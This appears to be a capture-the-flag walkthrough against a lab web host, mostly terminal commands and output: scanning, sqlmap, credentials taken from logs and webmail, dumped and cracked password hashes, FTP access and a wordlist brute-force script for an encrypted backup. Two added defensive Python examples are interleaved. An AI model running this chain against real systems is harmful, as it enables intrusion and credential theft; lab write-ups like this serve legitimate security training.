root@kali:~# netdiscover
Currently scanning: 192.168.67.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.56.1 08:00:27:00:e0:df 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.100 08:00:27:17:86:46 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.101 08:00:27:fe:04:1c 01 060 CADMUS COMPUTER SYSTEMS
root@kali:~# unicornscan -mT 192.168.56.101
TCP open ftp[ 21] from 192.168.56.101 ttl 64
TCP open ssh[ 22] from 192.168.56.101 ttl 64
TCP open http[ 80] from 192.168.56.101 ttl 64
TCP open https[ 443] from 192.168.56.101 ttl 64
TCP open imaps[ 993] from 192.168.56.101 ttl 64
TCP open pop3s[ 995] from 192.168.56.101 ttl 64
root@kali:~# nmap -sS -sV -O 192.168.56.101 -pT:21,22,80,443,993,995
Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-07 13:29 CET
Nmap scan report for 192.168.56.101
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.4a
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
MAC Address: 08:00:27:FE:04:1C (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.9, Linux 3.0 - 3.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
root@kali:~# nikto -host 192.168.56.101
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2014-01-07 13:35:52 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: 0x4da1930e20900
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2014-01-07 13:36:02 (GMT1) (10 seconds)
---------------------------------------------------------------------------
root@kali:~# nikto -ssl -host 192.168.56.101
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /CN=webhost
Ciphers: DHE-RSA-AES256-GCM-SHA384
Issuer: /CN=webhost
+ Start Time: 2014-01-08 11:50:48 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: 0x4da1930e20900
+ The anti-clickjacking X-Frame-Options header is not present.
+ Hostname '192.168.56.101' does not match certificate's CN 'webhost'
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the secure flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the secure flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...
+ Cookie phpMyAdmin created without the httponly flag
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Cookie SQMSESSID created without the secure flag
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 21 item(s) reported on remote host
+ End Time: 2014-01-08 11:52:53 (GMT1) (125 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.56.101
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Tue Jan 7 13:36:44 2014
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://192.168.56.101/forum/
+ http://192.168.56.101/index (CODE:200|SIZE:1782)
+ http://192.168.56.101/index.html (CODE:200|SIZE:1782)
+ http://192.168.56.101/server-status (CODE:403|SIZE:215)
---- Entering directory: http://192.168.56.101/forum/ ----
+ http://192.168.56.101/forum/LICENSE (CODE:200|SIZE:33093)
+ http://192.168.56.101/forum/README (CODE:200|SIZE:730)
==> DIRECTORY: http://192.168.56.101/forum/backup/
==> DIRECTORY: http://192.168.56.101/forum/config/
==> DIRECTORY: http://192.168.56.101/forum/images/
==> DIRECTORY: http://192.168.56.101/forum/includes/
+ http://192.168.56.101/forum/index (CODE:200|SIZE:7348)
+ http://192.168.56.101/forum/index.php (CODE:200|SIZE:7348)
==> DIRECTORY: http://192.168.56.101/forum/install/
==> DIRECTORY: http://192.168.56.101/forum/js/
==> DIRECTORY: http://192.168.56.101/forum/lang/
==> DIRECTORY: http://192.168.56.101/forum/modules/
==> DIRECTORY: http://192.168.56.101/forum/templates_c/
==> DIRECTORY: http://192.168.56.101/forum/themes/
==> DIRECTORY: http://192.168.56.101/forum/update/
---- Entering directory: http://192.168.56.101/forum/backup/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/install/ ----
+ http://192.168.56.101/forum/install/index (CODE:302|SIZE:0)
+ http://192.168.56.101/forum/install/index.php (CODE:302|SIZE:0)
+ http://192.168.56.101/forum/install/install (CODE:200|SIZE:12898)
---- Entering directory: http://192.168.56.101/forum/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/templates_c/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.101/forum/update/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
DOWNLOADED: 13776 - FOUND: 11
root@kali:/usr/share/dirb# dirb https://192.168.56.101 wordlists/small.txt
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Tue Jan 7 16:54:16 2014
URL_BASE: https://192.168.56.101/
WORDLIST_FILES: wordlists/small.txt
-----------------
GENERATED WORDS: 957
---- Scanning URL: https://192.168.56.101/ ----
+ https://192.168.56.101/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: https://192.168.56.101/forum/
+ https://192.168.56.101/index (CODE:200|SIZE:1782)
==> DIRECTORY: https://192.168.56.101/phpmyadmin/
==> DIRECTORY: https://192.168.56.101/webmail/
---- Entering directory: https://192.168.56.101/forum/ ----
+ Dumping session state and Quitting.
-----------------
DOWNLOADED: 1063 - FOUND: 2
http://192.168.56.101/forum/
http://192.168.56.101/forum/config/
sqlmap -u "http://192.168.56.101/forum/index.php" --data="mode=login&username=admin%27&userpw=a"
...
[13:49:41] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
http://192.168.56.101/forum/index.php?mode=user
sqlmap -u "http://192.168.56.101/forum/index.php?mode=user"
...
[13:53:05] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
admin Admin E-mail
MBrown User E-mail
RHedley User E-mail
SWillard Moderator E-mail
Sandy (sw@lazyadmins.corp)
Mark
Richy
sqlmap -u "http://192.168.56.101/forum/index.php?mode=user&show_user=1"
...
[13:56:03] [ERROR] possible integer casting detected (e.g. "$show_user=intval($_REQUEST['show_user'])") at the back-end web application do you want to skip those kind of cases (and save scanning time)? [y/N] y
[13:56:06] [INFO] skipping GET parameter 'show_user'
[13:56:06] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
http://192.168.56.101/forum/index.php?mode=contact&user_id=2
powered by my little forum
page source:
my little forum 2.3.1
forum:
Mar 7 11:15:28 testbox sshd[5766]: Connection from 10.10.2.131 port 46487
...
Mar 7 11:15:32 testbox sshd[5772]: Connection from 10.0.0.23 port 35154
Mar 7 11:15:32 testbox sshd[5772]: Invalid user !DFiuoTkbxtdk0! from 10.0.0.23
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user !DFiuoTkbxtdk0! [preauth]
...
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2
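The log excerpt above is the classic credential leak: a password typed into the username prompt lands in the sshd log as an "Invalid user" name, and the accepted login from the same address seconds later tells you whose password it is. The Python below is an added example, not part of the original post; it detects that pattern in auth-log lines and redacts such entries before a log is shared (for example pasted into a forum). The log lines it parses are constructed in the same format, with a made-up string in place of the real value.

```python
import re
from datetime import datetime, timedelta

# Constructed sample, modelled on the sshd lines in the forum post; the
# "username" on the Invalid-user lines is a made-up value, not a real credential.
SAMPLE_LOG = """\
Mar  7 11:15:28 testbox sshd[5766]: Connection from 10.10.2.131 port 46487
Mar  7 11:15:32 testbox sshd[5772]: Connection from 10.0.0.23 port 35154
Mar  7 11:15:32 testbox sshd[5772]: Invalid user Xy7!pq$Lm0# from 10.0.0.23
Mar  7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user Xy7!pq$Lm0# [preauth]
Mar  7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2
Mar  7 11:20:01 testbox sshd[5801]: Invalid user admin from 203.0.113.9
Mar  7 11:20:03 testbox sshd[5803]: Accepted publickey for deploy from 198.51.100.4 port 50122 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<time>\d{2}:\d{2}:\d{2})\s+"
    r"\S+\s+sshd\[\d+\]:\s+(?P<msg>.*)$")
INVALID_RE = re.compile(r"^Invalid user (?P<user>\S+) from (?P<ip>[\d.]+)")
ACCEPTED_RE = re.compile(r"^Accepted \S+ for (?P<user>\S+) from (?P<ip>[\d.]+)")
# Conservative shape of a Linux login name; anything else is treated as a possible secret.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}$")
REDACT_RE = re.compile(r"(?i)(invalid user )(\S+)")


def looks_like_secret(name):
    """True when the rejected login name does not look like a username at all."""
    return USERNAME_RE.match(name) is None


def parse_timestamp(mon, day, time):
    # The syslog timestamp carries no year; only differences are used here.
    return datetime.strptime(f"{mon} {int(day):02d} {time}", "%b %d %H:%M:%S")


def find_leaked_credentials(log_text, window=timedelta(seconds=60)):
    """Flag secret-looking 'Invalid user' names that are followed, from the same
    source address and within `window`, by an accepted login: the
    'password typed into the username prompt' pattern."""
    suspects = []   # (timestamp, leaked value, source ip)
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = parse_timestamp(m["mon"], m["day"], m["time"])
        inv = INVALID_RE.match(m["msg"])
        if inv:
            if looks_like_secret(inv["user"]):
                suspects.append((ts, inv["user"], inv["ip"]))
            continue
        acc = ACCEPTED_RE.match(m["msg"])
        if acc:
            for sts, leaked, ip in suspects:
                if ip == acc["ip"] and timedelta(0) <= ts - sts <= window:
                    # Report the account to rotate, never the leaked value itself.
                    findings.append({"account": acc["user"], "source": ip,
                                     "leaked_length": len(leaked),
                                     "at": ts.strftime("%b %d %H:%M:%S")})
    return findings


def redact_line(line):
    """Mask secret-looking names before the log leaves the host."""
    return REDACT_RE.sub(
        lambda m: m.group(1) + ("[REDACTED]" if looks_like_secret(m.group(2)) else m.group(2)),
        line)


if __name__ == "__main__":
    for f in find_leaked_credentials(SAMPLE_LOG):
        print(f"rotate password for {f['account']} (leaked from {f['source']} at {f['at']})")
    for line in SAMPLE_LOG.splitlines():
        print(redact_line(line))
```

The username heuristic is deliberately strict (lowercase POSIX names only); on a host with unusual naming conventions, widen USERNAME_RE rather than loosen the correlation, since the accepted login from the same address is what makes the finding actionable.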
by SWillard @, Monday, March 11, 2013, 09:43 (302 days ago)
Hi everybody
As you all know I got married a few days ago (yay :-D)
And because of this I have changed my email account to match MY NEEEWWW NAME :-D
Bye
Sandy Willard, formerly known as Sandy Raines ;)
https://192.168.56.101/forum/install/install
CREATE TABLE mlf2_userdata (user_id int(11) NOT NULL auto_increment, user_type tinyint(4) NOT NULL default '0', user_name varchar(255) NOT NULL default '', user_real_name varchar(255) NOT NULL default '', gender tinyint(4) NOT NULL default '0', birthday date NOT NULL default '0000-00-00', user_pw varchar(255) NOT NULL default '', user_email varchar(255) NOT NULL default '', email_contact tinyint(4) default '0', user_hp varchar(255) NOT NULL default '', user_location varchar(255) NOT NULL default '', signature varchar(255) NOT NULL default '', profile text NOT NULL, logins int(11) NOT NULL default '0', last_login timestamp NOT NULL default CURRENT_TIMESTAMP, last_logout timestamp NOT NULL default '0000-00-00 00:00:00', user_ip varchar(128) NOT NULL default '', registered timestamp NOT NULL default '0000-00-00 00:00:00', category_selection varchar(255) DEFAULT NULL, thread_order tinyint(4) NOT NULL default '0', user_view tinyint(4) NOT NULL default '0', sidebar tinyint(4) NOT NULL default '1', fold_threads tinyint(4) NOT NULL default '0', thread_display tinyint(4) NOT NULL default '0', new_posting_notification tinyint(4) default '0', new_user_notification tinyint(4) default '0', user_lock tinyint(4) default '0', auto_login_code varchar(50) NOT NULL default '', pwf_code varchar(50) NOT NULL, activate_code varchar(50) NOT NULL default '', language VARCHAR(255) NOT NULL DEFAULT '', time_zone VARCHAR(255) NOT NULL DEFAULT '', time_difference smallint(4) default '0', theme VARCHAR(255) NOT NULL DEFAULT '', entries_read TEXT NOT NULL, PRIMARY KEY (user_id)) CHAR SET=utf8 COLLATE=utf8_general_ci;
...
INSERT INTO mlf2_userdata VALUES (1, 2, 'admin', '', 0, '0000-00-00',
'c3ccb88dc0a985b9b5da20bb9333854194dfbc7767d91c6936', 'admin@example.com', 1, '', '', '', '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '', NOW(), NULL, 0, 0, 1, 0, 0, 0, 0, 0, '', '', '', '', '', 0, '', '');
http://192.168.56.101/forum/index.php?mode=login
user : mbrown
pass: !DFiuoTkbxtdk0!
http://192.168.56.101/forum/index.php?mode=user&action=edit_profile
E-mail: mb@lazyadmin.corp
Log out
https://192.168.56.101/webmail/src/login.php
username mb@lazyadmin.corp
pass: !DFiuoTkbxtdk0!
https://192.168.56.101/webmail/src/read_body.php?mailbox=INBOX&passed_id=2&startMessage=1
From: sw@lazyadmin.corp
Date: Sun, March 10, 2013 9:23 am
To: mb@lazyadmin.corp
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
Hi,
here is the login information for mysql:
Username: root
Password: S4!y.dk)j/_d1pKtX1
Regards,
Sandy
Subject: Audit
From: sw@lazyadmin.corp
Date: Sat, March 16, 2013 8:19 pm
To: mb@lazyadmin.corp
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
Hi Mark,
Lately we have made a password audit for all of our systems and we have seen
that you are using the same password for a few services.
Please be so kind and change your passwords. Please keep in mind to use
different passwords for different services. :)
Thank you!
Sandy
https://192.168.56.101/phpmyadmin/
https://192.168.56.101/phpmyadmin/Documentation.html
phpMyAdmin 3.4.10.1 Documentation
https://192.168.56.101/phpmyadmin/index.php?
user : root
pass: S4!y.dk)j/_d1pKtX1
Exporting rows from "mlf2_userdata" table
"1","2","admin",,"0","0000-00-00","fd339d53bf599d4ec7281ace84a902dc2ca16c7f63cbb16261","webmaster@lazyadmin.corp","1",,,,,"10","2013-03-24 19:03:02","2013-03-24 19:08:31","192.168.8.1","2013-03-09 15:57:17",NULL,"0","1","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
"2","0","RHedley","Richard Hedley","1","0000-00-00","31cbbdab9f5e1ebfa7d81267c258e29b5f9e171e6fcf7b1ba3","rh@lazyadmin.corp","1",,,,,"5","2013-03-24 19:09:38","2013-03-24 19:09:52","192.168.8.1","2013-03-09 16:22:22",NULL,"0","0","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
"3","0","MBrown","Mark Brown","1","0000-00-00","8a1bae9881bfbfc68880d1e23d6a095e80db27b7c43e56ccc1","mb@lazyadmin.corp","1",,,,,"7","2014-01-07 17:02:50","2014-01-07 17:02:50","192.168.56.102","2013-03-09 16:23:28",NULL,"0","0","1","0","0","0","0","0",,,,,,"0",,"15,4,2,1,3,5,9,10,11,12,13,14,7,6,8"
"4","1","SWillard","Sandy Willard","2","0000-00-00","c19038340b8f5d1fc70e9bfbc3336f7bf1e0935da5ef13d4ef","sw@lazyadmin.corp","1",,,,,"8","2013-03-24 19:09:08","2013-03-24 19:09:27","192.168.8.1","2013-03-09 16:25:13",NULL,"0","1","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
Exporting rows from "admin" table
"postfix@lazyadmin.corp","d189d0c727a549f263b93176fc851cec","2013-03-09 17:34:21","2013-03-24 19:01:06","1"
Exporting rows from "mailbox" table
"rh@lazyadmin.corp","20f1275ce5e67be2c06476333b68f585","Richard Hedley","rh@lazyadmin.corp/","0","rh","lazyadmin.corp","2013-03-09 18:55:10","2013-03-24 19:02:10","1"
"sw@lazyadmin.corp","07255e7701a86ad1672765d15082f1a3","Sandy Willard","sw@lazyadmin.corp/","0","sw","lazyadmin.corp","2013-03-09 18:56:35","2013-03-24 19:02:23","1"
"mb@lazyadmin.corp","d768176c4486ce77787c73883406fe97","Mark Brown","mb@lazyadmin.corp/","0","mb","lazyadmin.corp","2013-03-09 18:56:55","2013-03-24 19:01:37","1"
"mp@lazyadmin.corp","fa514a9f39391658b15d5db542029aa6","Miles Parker","mp@lazyadmin.corp/","0","mp","lazyadmin.corp","2013-03-09 21:14:40","2013-03-24 19:01:57","1"
Exporting rows from "user" table
"localhost","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"ubuntu","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"127.0.0.1","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"::1","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"localhost",,,"N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"ubuntu",,,"N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"localhost","debian-sys-maint","*27F84EF9FAA0E841963E4963EFC8D0EC7443A820","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","N",,,,,"0","0","0","0",,NULL
"localhost","phpmyadmin","*1E8775B9D4F8EF5A6722E7E0C57BA5985872FB98","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"localhost","mail","*0616BA40862AA9B5B194CD196808176F644B2828","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"localhost","forum","*FEAFF5308E872DB9CFBB7585CD62CB7383B53E75","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,NULL
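Read as an audit rather than as loot, the mysql.user export above shows what a reviewer should flag: anonymous accounts (empty user and empty password) on localhost and ubuntu, an application account (forum) holding every privilege, and unsalted native hashes, which make a reused password visible as an identical hash across accounts. The Python below is an added example and not part of the original post; it parses rows in that export format and reports those findings. Its sample rows are constructed, with placeholder hashes and only five privilege columns instead of the table's 29.

```python
import csv
import io
from collections import defaultdict

# Column layout of a mysql.user export: Host, User, Password, then the privilege
# flags. The real table has 29 such flags; this constructed sample keeps five so
# the rows stay readable. Hash values are placeholders, not taken from any export.
PRIV_COLUMNS = ["Select_priv", "Insert_priv", "Update_priv", "Grant_priv", "Super_priv"]

SAMPLE_EXPORT = '''\
"localhost","root","*CONSTRUCTED_HASH_1","Y","Y","Y","Y","Y"
"ubuntu","root","*CONSTRUCTED_HASH_1","Y","Y","Y","Y","Y"
"localhost",,,"N","N","N","N","N"
"ubuntu",,,"N","N","N","N","N"
"localhost","phpmyadmin","*CONSTRUCTED_HASH_2","N","N","N","N","N"
"localhost","forum","*CONSTRUCTED_HASH_3","Y","Y","Y","Y","Y"
"localhost","backup","*CONSTRUCTED_HASH_3","N","N","N","N","N"
"%","app","","Y","N","N","N","N"
'''


def parse_export(export_text):
    """Yield (host, user, password_hash, {priv: 'Y'/'N'}) for each exported row."""
    for row in csv.reader(io.StringIO(export_text)):
        if len(row) < 3 + len(PRIV_COLUMNS):
            continue  # blank or truncated line
        host, user, pw = row[0], row[1], row[2]
        privs = dict(zip(PRIV_COLUMNS, row[3:3 + len(PRIV_COLUMNS)]))
        yield host, user, pw, privs


def audit_accounts(export_text):
    """Return (account, reason) pairs for the weaknesses an exported
    mysql.user table makes visible."""
    findings = []
    for host, user, pw, privs in parse_export(export_text):
        who = f"'{user}'@'{host}'"
        if user == "":
            findings.append((who, "anonymous account"))
        elif pw == "":
            findings.append((who, "empty password"))
        if host == "%":
            findings.append((who, "reachable from any host"))
        if user != "root" and all(v == "Y" for v in privs.values()):
            findings.append((who, "application account holds every privilege"))
        elif user != "root" and (privs["Grant_priv"] == "Y" or privs["Super_priv"] == "Y"):
            findings.append((who, "GRANT or SUPER on a non-root account"))
    return findings


def shared_hashes(export_text):
    """Map each password hash shared by more than one distinct user name to those
    users. mysql_native_password hashes are unsalted, so an identical hash means
    an identical password."""
    users_by_hash = defaultdict(set)
    for host, user, pw, _ in parse_export(export_text):
        if user and pw:
            users_by_hash[pw].add(user)
    return {h: users for h, users in users_by_hash.items() if len(users) > 1}


if __name__ == "__main__":
    for who, reason in audit_accounts(SAMPLE_EXPORT):
        print(f"{who}: {reason}")
    for h, users in shared_hashes(SAMPLE_EXPORT).items():
        print(f"same password for {sorted(users)} (hash {h})")
```

The same user name appearing with one hash on several hosts (root@localhost, root@ubuntu, ...) is normal and is not reported; only distinct users sharing a hash are.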
https://crackstation.net/
20f1275ce5e67be2c06476333b68f585
07255e7701a86ad1672765d15082f1a3
d768176c4486ce77787c73883406fe97
fa514a9f39391658b15d5db542029aa6
20f1275ce5e67be2c06476333b68f585
md5 tum-ti-tum
07255e7701a86ad1672765d15082f1a3
md5 Austin-Willard
d768176c4486ce77787c73883406fe97 Unknown Not Found
fa514a9f39391658b15d5db542029aa6 Unknown Not Found
root@kali:/usr/share/dirb# ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.101:root): rhedley
331 Password required for rhedley
Password: (tum-ti-tum)
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ..
250 CWD command successful
ftp> pwd
257 "/" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 1 root root 60 May 13 2013 ftp
drwxrwx--- 1 mbrown mbrown 60 Mar 24 2013 mbrown
drwxrwx--- 1 mparker mparker 40 Apr 11 2013 mparker
drwxrwx--- 2 rhedley rhedley 87 Mar 24 2013 rhedley
drwxr-xr-x 2 1000 1000 36 May 12 2013 sraines
drwxrwx--- 5 swillard swillard 128 May 12 2013 swillard
226 Transfer complete
ftp> cd ftp
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
d-wxrwx-wx 1 ftp ftpadmin 60 May 13 2013 incoming
226 Transfer complete
ftp> cd incoming
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
--w-rwx-w- 1 ftp ftpuser 47984 Jan 11 2013 backup_webhost_130111.tar.gz.enc
ftp> get backup_webhost_130111.tar.gz.enc
local: backup_webhost_130111.tar.gz.enc remote: backup_webhost_130111.tar.gz.enc
200 PORT command successful
150 Opening BINARY mode data connection for backup_webhost_130111.tar.gz.enc (47984 bytes)
226 Transfer complete
47984 bytes received in 0.00 secs (63067.8 kB/s)
root@kali:~# hd backup_webhost_130111.tar.gz.enc | more
00000000 53 61 6c 74 65 64 5f 5f 6e 39 35 1e fa ac ea b9 |Salted__n95.....|
00000010 13 37 de 82 6f 35 c8 5c ad 90 eb 83 12 eb 05 af |.7..o5.\........|
00000020 4f 7c b2 0d 51 ad f6 41 cd 7f 80 81 78 cf d7 7a |O|..Q..A....x..z|
This is an OpenSSL salted encrypted file: the Salted__ magic is followed by the 8-byte salt.
I made an encrypt.sh:
#!/bin/bash
# Try each wordlist entry as the passphrase and stop at the first one openssl accepts.
# Note: the exit status of "openssl enc -d" only reflects the CBC padding check,
# so a wrong passphrase can still return 0 now and then (roughly 1 in 256).
while IFS= read -r LINE; do
  echo "$LINE"
  if openssl enc -d -des3 -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass "pass:$LINE"; then
    break
  fi
done < /usr/share/wordlists/metasploit-jtr/password.lst
./encrypt.sh
...
abscond
bad decrypt
3074345112:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539:
absconder
The password is absconder?
root@kali:~# openssl enc -d -des3 -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:absconder -p
salt=6E39351EFAACEAB9
key=61F734DD3D559913060B3A5F164B853A4D3777688F334E46
iv =677740BB2E10FD0A
root@kali:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: data
Something is wrong....
root@kali:~# ftp 192.168.56.101
Connected to 192.168.56.101.
